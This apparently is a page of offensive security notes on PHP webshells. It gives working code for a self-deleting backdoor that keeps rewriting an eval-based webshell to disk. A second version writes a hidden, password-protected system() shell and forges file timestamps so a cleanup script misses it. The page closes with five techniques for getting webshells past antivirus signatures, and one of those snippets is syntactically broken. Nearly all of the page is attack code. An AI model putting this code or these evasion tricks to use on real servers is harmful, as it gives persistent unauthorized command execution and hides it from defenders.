Webshell
PHP Backdoor
Here is a PHP backdoor that is extremely hard to delete:
<?php
// Let the script keeps executing even if client disconnects
ignore_user_abort(true);
// Disable script execution time limitation
set_time_limit(0);
// Delete this file iteself
unlink(__FILE__);
$file = 'shell.php';
$code = '<?php @eval($_POST["cmd"]);?>';
// Keep writing PHP one-liner backdoor into the file
while (1) {
file_put_contents($file, $code);
usleep(5000);
}
?>
It deletes itself by calling unlink(__FILE__)
and then keep writing the webshell code into shell.php
. An improved version of this backdoor is adding a password in case someone else uses it:
<?php
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
// Let the webshell be a hidden file
$file = '/var/www/dvwa/.config.php';
// password="super_secret_password"
$code = '<?php if(md5($_POST["pass"])=="a444f0a46019465ed8eb7f42548e6a0f"){@system($_POST[a]);}?>';
while (1) {
file_put_contents($file, $code);
// Modify the timestamp to bypass deletion bash script
system('touch -m -d "2022-04-25 12:14:32" .config.php');
usleep(5000);
}
?>
Antivirus Bypass
Suppose antivirus software matches <?assert($_REQUEST[;?>
and <?eval($_REQUEST[;?>
. If these two patterns are found, then the webshell is detected and deleted. Our objective is to achieve the same functionality without using these two patterns directly.
Idea 1: Define a constant
<?php define("a","$_REQUEST[cmd]");eval(a);?>
Idea 2: Define a function
<?php
function a($a)
{
return $a;
}
eval(a($_REQUEST)['cmd']);
?>
Idea 3: Define a class
<?php
class User
{
public $name='';
function __destruct()
{
eval("$this->name");
}
$user=new User;
$user->name=''.$_REQUEST['cmd'];
}
Idea 4: Parameter
<?php
$COOKIE=$_COOKIE;
foreach($COOKIE as $key=>$value)
{
if($key=='assert')
{
$key($_REQUEST['cmd']);
}
}
Idea 5: get_defined_functions()
<?php
$a=get_defined_functions();
$a['internal'][841]($_REQUEST['cmd']);
Hidding
Last updated
Was this helpful?